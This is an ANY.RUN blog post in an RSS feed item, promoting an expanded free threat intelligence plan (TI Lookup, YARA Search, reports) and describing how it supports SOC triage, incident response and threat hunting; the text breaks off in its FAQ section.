		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20272</guid>

					<description><![CDATA[<p>ANY.RUN has expanded access to Threat Intelligence capabilities for SOC and MSSP teams, backed by live attack data from 15,000 organizations.&#160; Here’s&#160;how your team can test&#160;TI&#8217;s impact on triage&#160;quality, response&#160;speed, and threat hunting workflows.&#160; See&#160;How&#160;Threat Intelligence&#160;Accelerates Your SOC&#160; ANY.RUN now&#160;offers&#160;20&#160;premium&#160;requests in&#160;Threat Intelligence Lookup&#160;and&#160;YARA Search&#160;as part of the&#160;Free plan.&#160;&#160; You can&#160;get&#160;immediate threat context for&#160;over 40 types [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/expanded-free-ti-plan/">More Attack Context for Faster Triage, Response, and Hunting. Now Available to Every SOC</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>ANY.RUN has expanded access to Threat Intelligence capabilities for SOC and MSSP teams, backed by live attack data from 15,000 organizations.&nbsp;</p>



<p>Here’s&nbsp;how your team can test&nbsp;TI&#8217;s impact on triage&nbsp;quality, response&nbsp;speed, and threat hunting workflows.&nbsp;</p>



<h2 class="wp-block-heading">See&nbsp;How&nbsp;Threat Intelligence&nbsp;Accelerates Your SOC&nbsp;</h2>



<p>ANY.RUN now&nbsp;offers&nbsp;<strong>20&nbsp;premium&nbsp;requests in&nbsp;</strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a><strong>&nbsp;and&nbsp;</strong><a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener"><strong>YARA Search</strong></a><strong>&nbsp;</strong>as part of the&nbsp;<a href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktotipricing" target="_blank" rel="noreferrer noopener">Free plan</a>.&nbsp;&nbsp;</p>



<p>You can&nbsp;get&nbsp;<strong>immediate threat context for&nbsp;over 40 types of IOCs, IOBs, and IOAs&nbsp;</strong>belonging to the latest malware &amp; phishing&nbsp;attacks. All data is&nbsp;sourced from real&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox</a>&nbsp;investigations by ANY.RUN’s community&nbsp;of 15,000 organizations and 600,000 security&nbsp;analysts&nbsp;and experts.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="540" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-1024x540.png" alt="" class="wp-image-20284" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-1024x540.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-768x405.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-370x195.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0-740x390.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png 1522w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI assistant interprets a lookup request in natural language, helps select sandbox analyses of malware using a TTP</em></figcaption></figure>



<p>AI-assisted search is available directly in the query flow, allowing analysts to use natural language and move from question to results without manual query building.&nbsp;</p>



<p>With this expanded access, SOC and MSSP teams can explore Threat Intelligence capabilities in their workflows and see how it affects core SOC processes&nbsp;for&nbsp;<strong>faster and&nbsp;more confident&nbsp;operations</strong>:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Reduce triage time:</strong>&nbsp;Validate&nbsp;alerts against ANY.RUN’s threat database to get immediate verdicts, full context, and access to related samples and activity.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Improve response accuracy:</strong>&nbsp;Pivot from a single indicator to connected infrastructure, artifacts, and behavior to understand how the attack unfolds and what else&nbsp;needs&nbsp;containment.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Run more effective threat hunts:</strong>&nbsp;Test hypotheses against live attack data, find related samples with YARA Search, and confirm relevance before expanding the hunt.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Build detections based on real attacks:</strong>&nbsp;Use discovered patterns and artifacts to create or refine detections aligned with current malware and phishing activity.&nbsp;</li>
</ul>



<p>This directly&nbsp;impacts&nbsp;key SOC metrics, including reduced time per investigation, lower escalation rates, and faster Mean Time to Respond.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Accelerate security workflows for faster triage &#038; response. <br>
<span class="highlight">Test Threat Intelligence in your SOC or MSSP.<br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=expanded-free-ti-plan&#038;utm_term=220426&#038;utm_content=linktotipricing#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">AI Search&nbsp;for Streamlined Investigations&nbsp;</h3>



<p>To speed up investigations and simplify how analysts work with Threat Intelligence, TI Lookup now includes AI-assisted search directly in the search bar.&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="595" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-1024x595.png" alt="" class="wp-image-20295" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-1024x595.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-300x174.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-768x447.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-370x215.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-270x157.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1-740x430.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_1.png 1510w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI Search suggesting a lookup parameter</em></figcaption></figure>



<p>Analysts can use natural language to query data, while the system automatically translates requests into structured queries with the correct parameters and wildcards.&nbsp;</p>



<p>This removes time spent on query construction and reduces friction in the workflow. Analysts move faster from alert to context, run more queries in less time, and get consistent results without&nbsp;additional&nbsp;steps.&nbsp;</p>



<h2 class="wp-block-heading">Fueling Core SOC Workflows&nbsp;</h2>



<p>Threat intelligence becomes truly valuable when it integrates into everyday operations.&nbsp;Here’s&nbsp;how it reinforces the three pillars of any SOC.&nbsp;</p>



<h3 class="wp-block-heading">1. Triage: From Guesswork to Confident Decisions&nbsp;</h3>



<p><strong>Alert volume</strong>&nbsp;is the defining operational challenge for most SOC teams. The ability to&nbsp;validate&nbsp;an alert quickly and to make a confident decision about whether to close it or escalate directly&nbsp;determines&nbsp;how efficiently a team can&nbsp;operate.&nbsp;</p>



<p>With ANY.RUN&#8217;s threat intelligence, analysts can&nbsp;immediately&nbsp;check an incoming indicator against a broad base of real-world attack data. Known-malicious infrastructure, recognized malware patterns, and previously documented campaigns can be matched in seconds. This means:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster</strong>, evidence-backed decisions on alert&nbsp;validity;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>A&nbsp;<strong>measurable&nbsp;</strong>reduction in the percentage of escalations driven by uncertainty rather than confirmed&nbsp;risk;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Lower&nbsp;</strong>analyst cognitive load during high-volume periods.&nbsp;</li>
</ul>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktolookup/#%7B%2522query%2522:%2522destinationIP:%255C%2522198.37.119.56%255C%2522%2522,%2522dateRange%2522:180%7D" target="_blank" rel="noreferrer noopener">destinationIP:&#8221;198.37.119.56&#8243;</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="598" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-1024x598.png" alt="" class="wp-image-20296" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-1024x598.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-300x175.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-768x449.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-370x216.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-270x158.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1-740x432.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_2-1.png 1510w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Quick verdict on the suspicious IP, campaign relations, infrastructure, and IOCs</em></figcaption></figure>



<p>Analysts spend less time on inconclusive alerts and more time on confirmed threats. With documented context to support every decision.&nbsp;</p>



<h3 class="wp-block-heading">2. Response: Seeing the Bigger Picture&nbsp;</h3>



<p>Once an incident is confirmed, speed and precision matter. The quality of the response depends on how well the team understands the threat: its connections, its infrastructure, its behavioral patterns, and its&nbsp;likely next&nbsp;moves.&nbsp;Two clicks in TI Lookup search results&nbsp;cited above&nbsp;take your analyst to&nbsp;<a href="https://app.any.run/tasks/403ae91b-2d4b-40a4-8807-e720552d6210/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">a sandbox session</a>&nbsp;of malware detonation and attack chain exposure:&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-1024x578.png" alt="" class="wp-image-20299" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-1536x867.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_3.png 1843w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Move from TI Lookup results to sandbox analyses exposing malware’s behavior</em></figcaption></figure>



<p>ANY.RUN&#8217;s threat intelligence enables response teams to map the relationships between indicators and the broader campaigns or actor groups behind them. Shared infrastructure, overlapping TTPs, and connected artifacts can be&nbsp;identified&nbsp;quickly, giving responders a structural understanding of what they are dealing with, not just a list of individual indicators.&nbsp;</p>



<p>This translates into:&nbsp;</p>



<ul class="wp-block-list">
<li>More complete&nbsp;<strong>scoping of incidents</strong>, with fewer blind&nbsp;spots;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Targeted&nbsp;<strong>containment and remediation</strong>&nbsp;actions grounded in&nbsp;evidence;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Higher confidence in&nbsp;<strong>response decisions</strong>.&nbsp;</li>
</ul>



<p>Overreaction and underreaction are reduced at the same time. The response becomes targeted, not reactive.&nbsp;</p>



<h3 class="wp-block-heading">3. Threat Hunting: Testing Hypotheses Against Reality&nbsp;</h3>



<p>Proactive threat hunting requires the ability to test hypotheses against real-world data.&nbsp;Analysts need to move from a suspicion about adversary behavior to a confirmed or refuted finding with enough evidence to act.&nbsp;</p>



<p>ANY.RUN&#8217;s threat intelligence gives hunters access to a rich, searchable base of behavioral data from real-world malware analysis. Campaign linkages, attacker infrastructure patterns, and behavioral signatures can all be researched in depth.&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="564" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-1024x564.png" alt="" class="wp-image-20301" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-1024x564.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-300x165.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-768x423.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-370x204.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4-740x408.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_4.png 1522w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>YARA Search accumulating artifacts and sandbox analyses</em></figcaption></figure>



<p><a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener">YARA Rules Search</a>&nbsp;adds a further dimension, allowing hunters to build and&nbsp;validate&nbsp;detection logic against current threat data.&nbsp;</p>



<p>The result is a hunting capability that is grounded in current, real-world evidence rather than theoretical models.&nbsp;It&nbsp;enables teams to find genuine threats and build detection coverage that reflects how adversaries&nbsp;actually behave. Hunting shifts from speculative to&nbsp;evidence-driven.&nbsp;</p>



<h2 class="wp-block-heading">How Threat Intelligence Impacts Your&nbsp;Business Outcomes&nbsp;&nbsp;</h2>



<p>Behind every alert, investigation, and response action, there is a business impact quietly accumulating.&nbsp;</p>



<h3 class="wp-block-heading">For Security Operations Teams (SOCs &amp; MSSPs):</h3>



<ul class="wp-block-list">
<li><strong>Alert validation accelerates</strong>, reducing the time from detection to decision.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Fewer escalations are driven by uncertainty</strong>; each escalation carries stronger evidentiary weight.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Investigation time decreases</strong>&nbsp;as analysts access contextualized data without pivoting between tools.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Analyst confidence improves</strong>, reducing the hesitation that slows response in high-pressure situations&nbsp;</li>
</ul>



<h3 class="wp-block-heading">For the Organization:</h3>



<ul class="wp-block-list">
<li><strong>Incident costs fall&nbsp;</strong>when threats are understood accurately and&nbsp;responded to&nbsp;precisely.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Faster response timelines</strong>&nbsp;limit attacker dwell time and reduce the scope of potential damage.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>The risk of missing significant threats decreases</strong>&nbsp;as detection and investigation are backed by broad, current intelligence.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Security investments deliver more measurable returns</strong>&nbsp;when team capacity is focused on real, confirmed risk.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Scale SOC Performance with Full Access to Threat Intelligence from ANY.RUN&nbsp;</h2>



<p>The&nbsp;Free plan is a genuine starting point: a full-capability evaluation that lets teams verify the value of ANY.RUN&#8217;s intelligence on real workflows. For organizations ready to operationalize threat intelligence at scale, ANY.RUN&nbsp;<a href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktotipricing" target="_blank" rel="noreferrer noopener">offers paid plans</a>&nbsp;designed for different operational needs.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="435" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-1024x435.png" alt="" class="wp-image-20302" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-1024x435.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-300x127.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-768x326.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-370x157.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-270x115.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5-740x314.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_5.png 1448w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s TI plans &amp; pricing</em></figcaption></figure>



<p>These include Live, Core, and Complete plans, allowing teams to choose the level of access and integration that fits their workflows and scale.&nbsp;&nbsp;</p>



<p>Across these plans, organizations can&nbsp;leverage&nbsp;the full set of threat intelligence capabilities, including:&nbsp;&nbsp;</p>



<p><strong>1.&nbsp;Threat Intelligence Feeds</strong>&nbsp;</p>



<p><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Continuous streams of validated indicators</a>&nbsp;enriched&nbsp;with behavioral context from the sandbox analyses, delivered directly into SIEM, EDR, IDS/IPS, and SOAR systems. This enables automated enrichment and faster&nbsp;detection&nbsp;pipelines.&nbsp;</p>



<p><strong>2. Threat Intelligence Reports: full access</strong>&nbsp;</p>



<p><a href="https://intelligence.any.run/reports/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">Structured analyses of active campaigns</a>, malware families, and attacker techniques. These reports&nbsp;provide&nbsp;ready-to-use insights for both operational response and strategic planning.&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="487" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-1024x487.png" alt="" class="wp-image-20303" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-1024x487.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-300x143.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-768x366.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-1536x731.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-370x176.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-270x129.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6-740x352.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_6.png 1817w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Reports: most pressing threats, most dangerous APTs</em></figcaption></figure>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Close blind spots and reduce exposure to critical incidents. <br>
Integrate <span class="highlight">ANY.RUN&#8217;s Threat Intelligence</span> in your SOC.
&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=expanded-free-ti-plan&#038;utm_term=220426&#038;utm_content=linktotipricing#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>What makes them particularly useful in operations:&nbsp;</p>



<ul class="wp-block-list">
<li>Clear breakdowns of campaigns, including&nbsp;<strong>tactics, techniques, and&nbsp;procedures</strong>;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Context around how attacks&nbsp;<strong>unfold in real&nbsp;environments</strong>;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Indicators and infrastructure tied together into&nbsp;<strong>meaningful&nbsp;clusters</strong>;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Ready-to-use insights that&nbsp;support both&nbsp;<strong>immediate response and long-term defense</strong>.&nbsp;</li>
</ul>



<p>Reports act as a bridge between raw telemetry and strategic understanding. They help teams not only react&nbsp;faster, but&nbsp;also recognize patterns before they escalate into incidents.&nbsp;</p>



<p><strong>3. Threat Landscape</strong>&nbsp;</p>



<p>A contextual layer that maps threats to industries and geographies, helping organizations understand where specific risks are most relevant to their business.&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup#%7B%2522query%2522:%2522threatName:%255C%2522salty2fa%255C%2522%2522,%2522dateRange%2522:60%7D" target="_blank" rel="noreferrer noopener">threatName:&#8221;vidar&#8221;</a>&nbsp;</p>



<p></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="392" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-1024x392.png" alt="" class="wp-image-20310" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-1024x392.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-300x115.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-768x294.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-370x142.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-270x103.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7-740x283.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_7.png 1518w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Lookup shows: Vidar trojan now targeting education, government, IT, and telecom in Europe and Americas</em>&nbsp;</figcaption></figure>



<p><strong>Together, these capabilities support key business&nbsp;objectives:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Reducing mean time to detect and respond (MTTD/MTTR);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Lowering operational costs of incident&nbsp;handling;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Improving analyst efficiency and capacity&nbsp;utilization;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Strengthening risk management and compliance posture.&nbsp;</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="836" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-1024x836.png" alt="" class="wp-image-20328" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-1024x836.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-300x245.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-768x627.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-1536x1254.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-2048x1673.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-370x302.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-270x221.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/ANY.RUN-Threat-Intelligence_article-740x604.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN TI plans</em></figcaption></figure>



<p>The result is a measurable improvement in how security operations contribute to overall business resilience.&nbsp;</p>



<h2 class="wp-block-heading">Final Thoughts</h2>



<p>The gap between threat detection and effective response is not primarily a technology problem.&nbsp;It&nbsp;is a data problem.&nbsp;When analysts have access to rich, current, contextual intelligence at the moment they need it, decisions improve and outcomes follow.&nbsp;</p>



<p>ANY.RUN&#8217;s unified threat intelligence — TI Lookup, TI Feeds, TI Reports, and YARA Search, all powered by real sandbox data from 15,000 organizations — gives SOC and MSSP teams that foundation. The free plan removes the evaluation barrier: any team can run it through real workflows, on real alerts, before&nbsp;committing to&nbsp;anything.&nbsp;</p>



<p>For teams that operationalize it, the cumulative effect is a SOC that is measurably faster, more&nbsp;accurate, and more confident — and an organization that is measurably harder to compromise and cheaper to defend.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;&nbsp;&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;&nbsp;</p>



<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich&nbsp;indicators&nbsp;with immediate context through&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the&nbsp;SOC.&nbsp;&nbsp;&nbsp;</p>



<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=expanded-free-ti-plan&amp;utm_term=220426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>,&nbsp;demonstrating&nbsp;its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;</p>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1776863123924"><strong class="schema-faq-question">What is included in the expanded entry-level plan?</strong> <p class="schema-faq-answer">It includes 20 investigations in Threat Intelligence Lookup with AI-assisted search, access to YARA search, and the free Threat Intelligence Reports to evaluate real workflows.</p> </div> <div class="schema-faq-section" id="faq-question-1776863205282"><strong class="schema-faq-question">How is this different from a typical trial?</strong> <p class="schema-faq-answer">It is not a limited demo. It allows teams to test threat intelligence directly within their SOC processes, using real alerts and investigations.</p> </div> <div class="schema-faq-section" id="faq-question-1776863216189"><strong class="schema-faq-question">What data powers ANY.RUN’s threat intelligence?</strong> <p class="schema-faq-answer">It is generated from real-world malware analyses in the ANY.RUN Interactive Sandbox, enriched with behavioral data, infrastructure links, and campaign context.</p> </div> <div 